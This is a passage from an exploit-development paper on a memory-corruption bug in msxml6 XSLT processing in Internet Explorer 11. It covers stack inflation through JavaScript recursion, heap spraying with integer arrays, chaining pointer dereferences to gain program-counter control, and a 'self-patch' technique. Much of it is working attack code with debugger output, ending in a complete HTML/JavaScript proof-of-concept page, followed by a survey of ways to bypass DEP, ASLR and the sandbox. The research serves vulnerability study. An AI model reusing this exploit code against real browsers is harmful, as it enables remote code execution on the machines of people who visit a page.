  0ed7b668 711c3e2d msxml6!XEngine::frame+0x84
  0ed7b710 7122ffb0 msxml6!XEngine::execute+0x1b4
  0ed7b76c 7122fee3 msxml6!XUtility::executeXCode+0x90
  0ed7b7c0 7122fe2b msxml6!XUtility::transformNode+0x4a
  0ed7b82c 7122fda2 msxml6!DOMNode::transformNode+0xa6
  ...


--[ 3.2 - Inflating the stack 2: JavaScript recursion

After the fail with XSLT recursion I turned back to JavaScript. The
following simple factorial implementation will produce a massive
recursion on the stack:


  function factorial(n) {
    if(n == 0) {
        trigger();
        return 1
    } else {
        return n * factorial(n - 1);
    }
  }
  ...
  <body onload="factorial(63)">


The vulnerability must be triggered from within the recursive code in
order to enjoy the inflated stack situation:


  msxml6!XEngine::stns+0x6:
  711c9c85 mov     edx,dword ptr [eax+8] ds:0023:03a004ca=????????

  0:005> !address eax

  Usage:                  PageHeap
  Base Address:           03961000
  End Address:            03a60000
  Region Size:            000ff000
  State:                  00002000  MEM_RESERVE
  Protect:                <info not present at the target>
  Type:                   00020000  MEM_PRIVATE
  Allocation Base:        03960000
  Allocation Protect:     00000001  PAGE_NOACCESS
  More info:              !heap -p 0x3541000
  More info:              !heap -p -a 0x3a004c2


  0:005> !heap
  Index   Address  Name      Debugging options enabled
  1:   016a0000
  2:   015e0000
  3:   00010000
  4:   019f0000
  5:   03720000 < landed here
  6:   06470000
  7:   06900000
  8:   06cd0000
  9:   07cb0000
 10:   07dd0000
 11:   09380000
 12:   07d60000
 13:   0c500000
 14:   0c670000
 15:   0cd30000


This time a valid userland address was accessed, and the access violation
was caused merely by the lack of a busy allocation on the address.

According to the observations made across multiple tests, the thread
stack will always start slightly below the edge of the memory page:


  test 1:
  0532fbbc 00000000 ntdll!_RtlUserThreadStart+0x1b
  test 2:
  04d7fd34 00000000 ntdll!_RtlUserThreadStart+0x1b
  test 3:
  04a5ffd8 00000000 ntdll!_RtlUserThreadStart+0x1b
  test 4:
  055bfe80 00000000 ntdll!_RtlUserThreadStart+0x1b


More precisely, the exact address of the beginning of the stack is
variable within the range of roughly 0x600 bytes, and so are the pointers
to stack-based variables; thus, the crashing pointer would be variable by
0x06000000 on x86 systems, which means that the initial invalid memory
access would be observed at a random memory address within a 100 Mb
memory range.

At this point we have two separate problems: first, to quickly fill at
least 200-300 Mb of memory with controlled data (100 Mb required to catch
the initial memory access, plus the room for secondary pointer
dereference padding, plus some compensation for the allocation addresses
variability), and second, to direct the crashing pointer into a specific
region of that memory.

Note that, although heap spraying is considered a bad practice for a good
reason, and that it's highly constrained if not impossible on 64bit
systems with 128G of memory space to fill, but the nature of our
vulnerability does not allow for an alternative approach. So, let's just
take it as an exercise in the artful dealing with whatever is.


--[ 3.4 - Filling the memory 1: images

Because the memory region that must be controlled is rather big, my
initial idea was to utilize some pre-calculated big objects for filling
it, such as images. The core of the idea is that, every piece of data
that can be consumed and processed by the target application (e.g. output
or rendered) has its place and a representation in the target process
memory. Thinking like that we don't get caught in stereotypical terms of
'heap spraying' and the specific techniques associated with it, many of
which are already mitigated in browsers.

The idea of using graphical images in vulnerability development is not
new. It was first introduced in 2006 by Sutton et al.[3], whose research
focused mainly on the aesthetics of shellcode steganography in images
rather than solving of any problems of heap spraying (as there were none
at that time). Later, a few researchers revisited the same idea in the
context of heap spraying, but it has never found a real application,
mainly because bitmaps (as the only format capable of incorporating a
byte pattern 'as is') are huge and can only be shrinked with the help of
server-side measures, while using other image formats for memory control
purposes is burdened with calculation problems of recompression.

Apart from the server-side GZIP compression, another solution that's never
publicly noted is PNG. The PNG compression is very simple and does not
affect the bitmap structure at large. As a result, a 2Mb BMP image
containing a simple 1-byte pattern can be converted into a ~500 bytes PNG
image, that will be decompressed back into the original bitmap in the
rendering process memory.

There are two problems however:

1. The more variable is the source bitmap pattern, the bigger is the
resulting PNG image; a natural limitation of any compression.

2. The decompressed PNG has extra bytes in the bitmap data, injected after
every 3 bytes of the original bitmap. It's probably a transparency channel
or some other data specific to the PNG format.

The good news:

1. At the point when the PNG image is loaded and decompressed by the
browser but is not yet displayed on the web page, the bitmap data in the
process memory fully corresponds to the source BMP.

2. A large image is mapped into a comparably large and continuous chunk of
memory, located at a somewhat predictable memory offset.

The PNG spraying technique proved to be not suitable for this particular
case because a highly variable memory padding pattern would be required,
and so the images would have to be too big anyway. However it still looks
like an interesting technique for rapid filling of huge memory areas with
a simple byte pattern.


--[ 3.5 - Filling the memory 2: integers

After testing various memory filling techniques, I've finally settled on
integer arrays. The following JavaScript code will quickly fill 400Mb of
the memory of Internet Explorer 11 with a continuous constant-dword spray:


  var intArr = new Array;
  var count = (0x19000000-0x20)/4;
  intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01
  for(var i=1; i<=count; i++)
  intArr[i] = 0x17151715;
  alert('done');


It's curious to note that varying the values in the spraying loop may
sometimes result in an internal exception in IE, e.g. when trying to fill
more than 400 Mb of the browser memory, or using an 'AAAA' integer
equivalent for the filling. This looks like a protection from heap
spraying, but it does not pose a major obstacle to the task.

The resulting memory filling is distributed across two big and continuous
allocations as follows:


  0:028> s 0 l?80000000 ee ff c0 01
  0531b4f0  ee ff c0 01 f8 ff ff ff-00 00 00 00 00 00 00 00  .............
  ; just the marker dword, not relevant
  08391860  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............
  ; a <0x200 bytes chunk, not relevant
  085dd0d8  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............
  ; a <0x10 bytes chunk, not relevant
  085de510  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............
  ; a <0x200 bytes chunk, not relevant
  12da5a18  ee ff c0 01 e3 ff c0 01-ce ff c3 01 b8 ff cc 01  .............
  ; random garbage
  2c540020  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............
  ; the array, part 1
  3eec0020  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............
  ; the array, part 2


The first allocation looks like simply unfinished, stopped around 300Mb,
while the second allocation is full, and both of them are contiguous:


  0:028> s 0 l?80000000 ee ff c0 01
  ...
  2c540020  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3eec0020  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............

  0:028> ? 3eec0020-2c540020
  Evaluate expression: 311951360 = 12980000

  0:028> db 2c540020+12980000-30
  ; this is the borderline between the 1st and the 2nd allocations
  3eebfff0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  .............
  3eec0000  00 00 00 00 90 c4 fb 1e-00 00 00 00 00 00 00 00  .............
  3eec0010  00 00 00 00 f9 ff 3f 06-20 f1 be 07 00 00 00 00  ......?. ....
  3eec0020  ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3eec0030  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3eec0040  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3eec0050  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3eec0060  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............

  0:028> db 2c540020+12000000
  ; end of the 1st allocation is somewhere in between sizes
  ; 12000000 and 12980000
  3e540020  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3e540030  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3e540040  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3e540050  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3e540060  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3e540070  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3e540080  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  3e540090  15 17 15 17 15 17 15 17-15 17 15 17 15

  ;the second allocation:
  0:028> db 3eec0020+19000000
  ; pointers after the end of the allocation
  57ec0020  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0030  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0040  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0050  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0060  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0070  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0080  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0090  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  0:028> db 3eec0020+19000000-30
  ; end of the second allocation
  57ebfff0  15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17  .............
  57ec0000  15 17 15 17 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0010  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0020  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0030  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0040  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0050  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............
  57ec0060  02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80  .............


Considering the addressing predictability of the allocations, two
observations can be made across multiple tests:

1. Both allocations are aligned by 16 pages, added 0x20 bytes header with
full page heap setting enabled (or 0x8 with the default setting).

2. The memory addresses of both allocations are highly predictable.

In fact, the addresses of the two allocations would vary across the tests
by 'just' approximately 0x1'000'000 bytes, which is not significant in
terms of a 0x19'000'000+0x12'000'000 nearly continuous controlled memory
space:


  ; windbg script log edited for readability
  ; produced by re-launching the app and recording the same allocations
  ; shows the addresses of the two intarray allocations
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x27f30020
  0x3a8b0020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x283f0020
  0x3ad70020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x27ea0020
  0x3a820020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x28530020
  0x3aeb0020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x284e0020
  0x3ae60020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x28aa0020
  0x3b420020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x28e60020
  0x3b7e0020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x28440020
  0x3adc0020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x28560020
  0x3aee0020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x28480020
  0x3ae00020
  Opened log file 'c:\users\user\desktop\windbg.log'
  0x28a00020
  0x3b380020


Without researching the exact reasons of the highly predictable memory
allocations, it seems logical if not inevitable that, the bigger the
allocation, the more predictable its address would be on x86 systems
because of the memory space limitation. This speculation is totally
confirmed by observations with various allocation sizes.

Considering the reliability risks of the allocations disposition in the
memory, the expected memory map will likely change in the following
situations:

1. Additional modules loaded by the browser, such as a BHO or an ActiveX.
This factor cannot possibly be remote-controlled. On the other hand, the
average size of an executable module is insignificant in terms of a 400Mb
controlled memory allocation, so it shouldn't distort the expected memory
map too much.

2. Additional web content processed in the same tab (images loaded,
JavaScript executed etc.), that would change the stack situation. Because
each IE tab is loaded in a separate process, this factor can be totally
controlled by the vulnerable web page.

3. Microsoft changes IE internals. Not possible to control.

4. Full page heap setting enabled or disabled. The full page heap setting
changes the entire memory layout significantly enough that the
vulnerability control code must be fine-tuned with this regard
specifically.

All in all, at that point the memory landing space looks safe enough to
be addressed.


--[ 3.6 - Recursion control

Having the control over the continuous region of memory in the range
[0x28000000,0x57000000], it would probably be the safest to direct the
crashing pointer in the middle of the range, e.g. around 0x47000000. To
achieve this, the JavaScript recursion count must be specifically
calculated to reach the crashing procedure around the stack offset of
0x...4700.

The size of one JavaScript recursion frame in Internet Explorer 11 is
0x320, each frame corresponding to one cycle of the factorial algorithm:


  ; JavaScript factorial algorithm recursion on the stack
  0529b0d4 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8
  0529b0e0 0x86c0fd9
  0529b428 jscript9!Js::InterpreterStackFrame::Process+0xbd7
  0529b544 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8
  0529b550 0x86c0fd9
  0529b898 jscript9!Js::InterpreterStackFrame::Process+0xbd7
  0529b9b4 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8
  0529b9c0 0x86c0fd9


Provided that the vulnerable browser will crash randomly around the stack
offsets 0x...ac00 to 0x...b300, the stack must be inflated by
0xb650(+-0x350)-0x4700=0x6f50(+-0x350) bytes, which requires
(0x6f50+-0x350)/0x320=35+-1 cycles of recursion, or the call to
factorial(35). Indeed, testing this would cause an access violation
around the desired address:


  (268.2a4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=489019b1 ebx=1a819ff0 ecx=1a819f42 edx=6f6e4430 esi=1a819f40
  edi=19b14770 eip=6f6f9c85 esp=19b1476c ebp=19b14888 iopl=0
  nv up ei pl nz na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00010206
  msxml6!XEngine::stns+0x6:
  6f6f9c85 mov     edx,dword ptr [eax+8] ds:0023:489019b9=????????


--[ 3.7 - Program counter control

According to the vulnerable XCode execution logic, the address of the
dynamic call in XEngine::brns() is retrieved via three consecutive
dereferences from the crashing pointer:


  msxml6!XEngine::stns:
  6f6f9c7f mov     eax,dword ptr [ecx+0B0h] ; retrieved ptr0 (eax)
  6f6f9c85 mov     edx,dword ptr [eax+8] ; ptr0 -> crash / ptr1 (edx)
  6f6f9c88 push    esi
  6f6f9c89 lea     esi,[edx+0Ch]
  6f6f9c8c mov     dword ptr [eax+8],esi
  6f6f9c8f mov     eax,dword ptr [edx+4] ; ptr1 -> ptr2 (eax)
  6f6f9c92 push    8
  6f6f9c94 mov     dword ptr [ecx+0A4h],eax ; store ptr2
  6f6f9c9a pop     eax
  6f6f9c9b pop     esi
  6f6f9c9c ret
  ...
  msxml6!XEngine::brns:
  712da250 mov  edi,edi
  712da252 push esi
  712da253 mov  esi,ecx
  712da255 mov  ecx,dword ptr [esi+0A4h];restore ptr2 (2 bytes randomized)
  712da25b mov  eax,dword ptr [ecx]  ; ptr2 -> ptr3 (eax)
  712da25d call dword ptr [eax] ; ptr3 -> shellcode


Thus, the landing memory contents at ptr0 must satisfy the following
dereference logic:


  Ptr0 (initial AV / address in the spray ) ->
  ptr1 -> ptr2 -> ptr3 -> shellcode


In the above chain of pointers, pointers 1 and 3 are precise, as they are
read from  the memory padding; but pointer 0 is random within a 100Mb
range due to the nature of the bug, and pointer 2 is only page-precise
due to the 2-byte memory alignment differences in the procedures where
the pointer is stored and then restored.

Thanks to the randomized memory access only on the 0th and the 2nd
pointers, two split memory areas are required to contain the entire
dereference chain, one part (and the first dereferenced) containing the
pointers to the second part, the second part containing the pointers to
the shellcode, and the presize addresses treated specifically:


  function poc()
  {
    // !!! +hpa required !!!
    // bp msxml6!xengine::stns; bp msxml6!xengine::brns; g;

    var intArr = new Array;
    intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01

    var count = (0x19000000-0x20)/4; // 400 Mb

    for(var i=1; i<=count; i++)
    {
        // part1: ptr0/ptr1 read
        if ( i<(0x12000000/4) )
        {

            if ( ((i*4+0x20)&0xffff) == (0x3c3c+4) ) //if it's a ptr1 read
                intArr[i] = 0x54545454; // then yield ptr2
            else
                intArr[i] = 0x3c3c3c3c; // otherwise, ptr1

        }
        // part2: ptr2 read
        else
            intArr[i] = 0x00badd1e; // ptr3 -> shell code
    }
    crash();
  }


The numerical values in the script were chosen empirically with the full
page heap enabled; tweak them if anything doesn't work.


  And the result should be:
  (ddc.f28): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00badd1e ebx=11f71ff0 ecx=5454492c edx=5454492c esi=11f71f40
  edi=04ef4740 eip=6f6fa25d esp=04ef4738 ebp=04ef4858 iopl=0
  nv up ei pl nz na po nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b
  gs=0000             efl=00210202
  msxml6!XEngine::brns+0xd:
  6f6fa25d ff10          call    dword ptr [eax] ds:0023:00badd1e=????????


--[ 4 - The self-patch

The next section will discuss the possible useful application of the
gained control over the vulnerability without any shell code execution:
self-patching of the vulnerable process.


--[ 4.1 - A leak without a leak

Unlike many memory corruption vulnerabilities, this particular one does
not allow for an arbitrary memory write that could be used to leak some
information allowing to bypass DEP and ASLR and to execute arbitrary code
within the IE sandbox. But the nature of the vulnerability would still
allow for a small and limited information leak, which can be used to
restore the memory values, required to continue the normal execution (
CoE) of the vulnerable application.

Specifically, because the crashing pointer contains the upper word of the
stack offset in its lower part due to the misaligned memory read, and the
controlled memory space is page-aligned, it is possible to 'leak' part of
the stack address by translating the accessed memory address into the
value read from that address with the help of the carefully calculated
memory padding.

There are a few key points to understand about our precisely patterned
padding.

1. We start with the idea that each dword in the spray must contain the
value of its own offset to the page. Page-size patterning is enough
because we only want to leak about 2 bytes of the stack address.

2. Next, we calculate all pattern values based on the spray loop counter
as follows: i_pattern = i*4%0x1000;

3. We ensure that the aligned spray will as well align in memory by
allocating a big enough continuous chunk of memory. Big memory
allocations tend to be 16-pages aligned, i.e. starting with an address
like 0xXYZQ0000 (see also windbg.log above), which looks like a sane
memory optimization strategy with the
heap manager.

4. Next, because the padding must resolve two consecutive memory
dereferences while preserving the leaked bits of data inside the actual
pointers, we split the page-sized pattern in two halves and fill them
differently:


  else if (i_pattern < 0x0700)
    intArr[i] = ptr12base + ptr1;
  else
    intArr[i] = ptr12base + ptr2;


This trick is only possible because of very little entropy observed in the
high-order part of the randomly allocated stack offset, which tends to be
around 0x04xxxxxx-0x06xxxxxx. Hence we in fact only want to leak 11 bits
of the address and not 16, for which a 0x700 bytes pattern is sufficient.

5. We differentiate the pointers in the two parts of the pattern by
adding and removing a hand-picked, semi-random delta value to the leaking
part of the pointer:


  var delta = 0x3300;


6. Finally, we adjust the calculations to the values of the respective
dereference indexes, e.g. [eax+8] for the first read, as well as to the
size of the heap header, which is 0x20 with full page heap:


  ptr1 = (i_pattern - 8 + 0x20 + delta);
  ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff));


Note that we mindfully use a delta value bigger than the size of the
pattern, and then we also preserve the 2 higher bits of the added delta
value in the 2nd stage pointers, that will eventually increase the
reliability of the padding in the cases of misaligned memory access by
ensuring that the majority of bytes in the spray will be equal to 0x38,
and thus the final pointer will likely point into the controlled memory
around 0x38xxxxxx, regardless of both the reading
alignment and the leaked bits in the pointer.

As a result of the correctly calculated and a correctly positioned
padding, the initially read memory offset will re-surface in the program
as the low-order word of the value that's eventually read from the range
0x3838xxxx:


  0:007> dd 4b6004e0+8
  ; 4b6004e0 = the original AV pointer
  ; 0th read // mov     edx,dword ptr [eax+8]
  4b6004e8  383837e0 383837e4 383837e8 383837ec
  4b6004f8  383837f0 383837f4 383837f8 383837fc
  4b600508  38383800 38383804 38383808 3838380c
  4b600518  38383810 38383814 38383818 3838381c
  4b600528  38383820 38383824 38383828 3838382c
  4b600538  38383830 54545454 38383838 3838383c
  4b600548  38383840 38383844 38383848 3838384c
  4b600558  38383850 38383854 38383858 3838385c
  0:007> dd 383837e0+4
  ; 1st read // 04e0 is the high word of the stack address
  383837e4  383804e0 383804e4 383804e8 383804ec
  383837f4  383804f0 383804f4 383804f8 383804fc
  38383804  38380500 38380504 38380508 3838050c
  38383814  38380510 38380514 38380518 3838051c
  38383824  38380520 38380524 38380528 3838052c
  38383834  38380530 38380534 54545454 3838053c
  38383844  38380540 38380544 38380548 3838054c
  38383854  38380550 38380554 38380558 3838055c


The read value, that is the two leaked bytes of the stack offset, will
then be used by the application itself to restore the original 3rd
pointer, which results in retrieving of the correct address of the
dynamic call in XEngine::brns(), and resuming of the program execution
like if there was no vulnerability:


  0:007> p
  ; our crafted value (read from the memory padding)
  ; with 2 leaked bytes of the stack address 04e0:
  eax=383804e0
  ...
  ; write the crafted value
  msxml6!XEngine::stns+0x15:
  6f6f9c94 8981a4000000    mov     dword ptr [ecx+0A4h],eax

  ; value written via the misaligned pointer:
  0:007> dd ecx+a4 l1
  11b3dfe6  4c1404e0

  ; value read via the sane pointer:
  0:007> dd ecx+a4-2
  11b3dfe4  04e04c2c

  ; looks good:
  0:007> dds 04e04c2c
  04e04c2c  6f6e44b8 msxml6!RTFNodeSet::`vftable'

  ; the original call pointer restored:
  0:007> dds poi 04e04c2c
  6f6e44b8  6f6e44d5 msxml6!XPSingleTextNav<WhitespaceCheck>::_getParent


And the result is the target application passing the crash-inducing code
without a crash:


                   *------------------------*
                   | Message from webpage X |
                   |------------------------|
                   |                        |
                   |     Look, no calc!     |
                   |                        |
                   |         / OK /         |
                   *------------------------*


--[ 4.2 - The offset-to-value translation

As per my testing boxen, the upper word of the stack address would never
exceed 0x06xx, and thus the crashing pointer would always fall within the
first 0x700 bytes of the target memory page, so the remaining 0x900 bytes
of the page may be used for the translation purposes:


  var i_pattern = i*4%0x1000; // index into the current page

  ptr1 = (i_pattern - 8 + 0x20 + delta);
  ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff));

  if (i_pattern < 0x0700)
    intArr[i] = ptr12base + ptr1;
  else
    intArr[i] = ptr12base + ptr2;


The problem here is that the original crashing pointer is not guaranteed
to be correctly aligned, while the memory translation pattern must be
dword-aligned. That is, the correctly aligned memory access will result
in reading a value like 0x3838XYZQ from the spray, where XYZQ are the
leaked bits of the stack offset. But let's see what's read with a
misaligned pointer:

a. off by 1: 0x38XYZQ38

In this case the pointer still falls into the controlled memory area, but
the XY bits of the leaked stack address will be mangled, because we can
only guarantee 64Kb alignment of memory allocations.

b. off by 2: 0xXYZQ3838

All bits of the stack address are lost, and the pointer looks
unpredictable. But we can still enforce this to point to the controlled
memory around 0x38xxxxxx by adding a specially crafted delta value of
0x3300 to calculated pointers in the spray as was mentioned earlier. So,
e.g. the read value 0x07073838 will become a valid pointer to 0x3a373838.
This is possible because the high 4 bits of the stack offset tend to be
zero.

c. off by 3: 0xZQ3838XY

Most important bits of the stack offset are lost in this case, and also
the ZQ leaked bits are highly entropic and cannot be made predictable as
in the case b. Not much can be done with this case, that's likely to
point into random memory and possibly cause an access violation.

One thing to notice about the misalignment cases above is that both
pointers a. and b. quite logically end with 0x38 that we use as the
pattern base. So, we can catch 2 out of 3 misalignment cases in the code
by checking the final byte against this value, and then address them
specifically e.g. to fall back to raw EIP control instead of allowing a
crash:


  // the address ends with 0x38+4:
  if ( ((i*4+0x20)&0xff) == (pbyte+4) )
    intArr[i] = ptrcall;
  ...
  0:007> r
  eax=4fc0055e ; the crashing pointer
  ...
  0:007> dd eax+8
  ; 0th read: misaligned
  4fc00566  38603838 38643838 38683838 386c3838
  4fc00576  38703838 38743838 38783838 387c3838
  4fc00586  38803838 38843838 38883838 388c3838
  4fc00596  38903838 38943838 38983838 389c3838
  4fc005a6  38a03838 38a43838 38a83838 38ac3838
  4fc005b6  38b03838 38b43838 38b83838 38bc3838
  4fc005c6  38c03838 38c43838 38c83838 38cc3838
  4fc005d6  38d03838 38d43838 38d83838 38dc3838
  0:007> dd 38603838+4
  ; 1st read: special value
  3860383c  54545454 3838053c 38380540 38380544
  3860384c  38380548 3838054c 38380550 38380554
  3860385c  38380558 3838055c 38380560 38380564
  3860386c  38380568 3838056c 38380570 38380574
  3860387c  38380578 3838057c 38380580 38380584
  3860388c  38380588 3838058c 38380590 38380594
  3860389c  38380598 3838059c 383805a0 383805a4
  386038ac  383805a8 383805ac 383805b0 383805b4
  0:007> dd 54545454
  ; 2nd read / call address
  54545454  00badd1e 00badd1e 00badd1e 00badd1e
  54545464  00badd1e 00badd1e 00badd1e 00badd1e
  54545474  00badd1e 00badd1e 00badd1e 00badd1e


Regarding the last, 3-bytes misaligned memory access case that reads
pointers like 0xZQ3838XY where ZQ is totally random, this is asking to
precisely control the contents of entire memory space of the process,
that may be not impossible but is likely not worth it. So I leave it
alone as a crash.


The final code is:


  <!doctype html>
  <html>
  <head>

  <script>

  function crash()
  {
    xslcontent=
    '<xsl:stylesheet
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" \\
    version="1.0"><xsl:template name="main_template"
    match="/"><xsl:for-each \\
    select="*"><xsl:apply-templates/></xsl:for-each>
    </xsl:template><xsl:template \\ name="xx"
    match="x[position()]" /></xsl:stylesheet>';

    srcTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
    xsltTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
    xsltTree.loadXML(xslcontent);
    alert("crash");
    srcTree.transformNode(xsltTree);
  }

  function selfpatch()
  {
    // !!! +hpa required !!!
    // bp msxml6!xengine::stns;bp msxml6!xengine::brns;g;

    var intArr = new Array;
    intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01

    var count = (0x19000000-0x20)/4; // 400 Mb

    // ptr0(spray/crash)->ptr1->ptr2->ptr3->shellcode
    // 0x3a..0x40.. -> 0x3838xxxx -> 0x3838yyyy -> patch or shellcode

    var pbyte = 0x38; // play with me
    // landing for the initial memory access:
    var ptr12base = (pbyte<<24)+(pbyte<<16);  //0x38380000
    var ptr1 = 0; // calculated from the page offset
    var ptr2 = 0; // calculated from the page offset
    var ptrcall = 0x54545454; // 0x5454xxxx -> pointers to call address

    var delta = 0x3300;
    // delta is added and removed to segregate the 1st
    // and the 2nd memory access areas within the pattern;
    // the additional bits above 0x1000 are used to enforce
    // the successful 1-byte misaligned memory access

    for(var i=1; i<=count; i++)
    {
        var i_pattern = i*4%0x1000; // index into the current page

        // let's fill the spray tail with plain pointers to shellcode
        if ( i>(0x12000000/4) ) // which defines where the 'tail' begins
        {
            intArr[i] = 0x00badd1e;
            continue;
        }

        ptr1 = (i_pattern - 8 + 0x20 + delta);
        ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff));

        // misaligned memory access: fallback to code exec
        if ( ((i*4+0x20)&0xff) == (pbyte+4) )
            intArr[i] = ptrcall;

        // well aligned memory access: restore the pointers
        else if (i_pattern < 0x0700)
            intArr[i] = ptr12base + ptr1;
        else
            intArr[i] = ptr12base + ptr2;
    }

    crash();
    alert("Look, no calc!");
  }

  function factorial(n)
  {
    if (n == 0)
    {
        selfpatch();
            return 1;
        }
    else
        return n * factorial(n - 1);
  }
  </script>

  </head>
  <body onload="factorial(30);">
    <form id="a">
    </form>
    <dfn id="b">
    </dfn>
  <div id="resTree"></div>

  </body>
  </html>


On my testing boxes, the final proof-of-concept code yields a self-patch
in 25% of test cases, a fallback control in 50% of cases, and the
inevitable crash in 25% of cases. This result agrees with the theoretical
expectation of the maximal possible gain from the offset translation
approach. The previous code-execution only proof-of-concept code should
yield EIP control in 100% of test cases.


--[ 5 - Further work

Taking the bug to arbitrary code execution is considered out of scope for
this paper, but let's review the state of the art.

Although the bug itself allows for the full control over the program
counter, as it was showed with the proof-of-concept provided in the
section 3.7, such a possibility is inherently burdened with two factors:

1. A heap spray is required due to the entropic nature of the bug, that
makes the pc control less reliable, if not...

2. ...if not impossible, in the case of x64 bit systems with memory too
wide to spray.

Few years ago a browser EIP control would be considered a 'game end'. But
today it's just the beginning of a completely different game, or rather,
of two different games: mitigations bypass for a sandboxed code
execution, and a sandbox bypass for the arbitrary code execution.

In this game, Internet Explorer 11 is possibly the 2nd best hardened
popular product, after the Google Chrome. Each major version of IE in the
past years has introduced a major improvement to the system of security
mitigations, up to the point when Microsoft was able to back and test the
state of the product security with a $100k worth Bypass bounty, which
says a lot. Another important indicator is the statistics for real IE11
exploits that may be observed both ITW (in the wild) and in the
metasploit, that's pretty scarce.

Among the dozens of mitigations included in the modern IE[4], many old
mitigations have become largely irrelevant, along with the corresponding
classes of bugs that were gradually audited out of existence (such as
buffer overflows and the corresponding GS stack cookie mitigation). On
the other hand, the newer mitigations for more realistic classes of bugs
such as Use-after-free are still too weak, e.g. the IsolatedHeap which is
only selectively relevant to certain bugs, or MemoryProtection which
includes the side-walks allowing to bypass it in
practice[5]. The new Control Flow Guard included in Windows 8.1 has been
bypassed both in the wild and in research[6] even before its full backward
deployment on the still-popular systems like Windows 7. Only two
mitigations before the sandbox are universally frustrating for a binary
researcher regardless of a bug class: DEP strictly in conjunction with a
forced ASLR.

The ForceASLR mitigation was introduced in IE10, and wiped a whole class
of easy and reliable DEP+ASLR bypass techniques which relied upon both
system and  3rd party DLLs compiled without the explicit support for
ASLR, allowing for constructing an executable ROP chain with pieces of
their code at known addresses.

Another opportunity that allowed to bypass DEP+ASLR in a generic way was
utilizing executable memory pages generated by 'Just in time' compiler of
Adobe Flash.[7] This technique had been mitigated early on, although it's
not clear whether it's completely dead. In any case, it is limited due to
the Adobe Flash dependency.

The main[stream] technique used today to bypass DEP+ASLR is to leak some
information about the process address space via a memory-leaking
opportunity, typically a forced memory leak with a memory corruption
vulnerability.[8] The most common way observed to force a memory leak is
to corrupt a client-readable object in a certain way allowing for removal
of the reading limits: such as a BSTR string in JavaScript (which is said
to be removed from jscript9.dll with IE9 but can still be accessed in
IE11[9]), various arrays in JavaScript and the Vector object in Flash. To
achieve such a bypass, either a second vulnerability must be used, or in
some cases, the same vulnerability can provide both a code execution and
a memory leaking opportunity.

Another branch of research worthy of a notice is the class of 'lazy'
arbitrary code executions introduced by Chinese researchers[10], that
takes a write-what-where vulnerability condition to enable a privileged
JavaScript execution instead of dealing with shell codes. This is not a
bypass technique in its own, because it still relies on a memory read/
write vulnerability that can provide a memory leak anyway, but rather an
example of a minimalist goal-oriented thinking as opposed to the
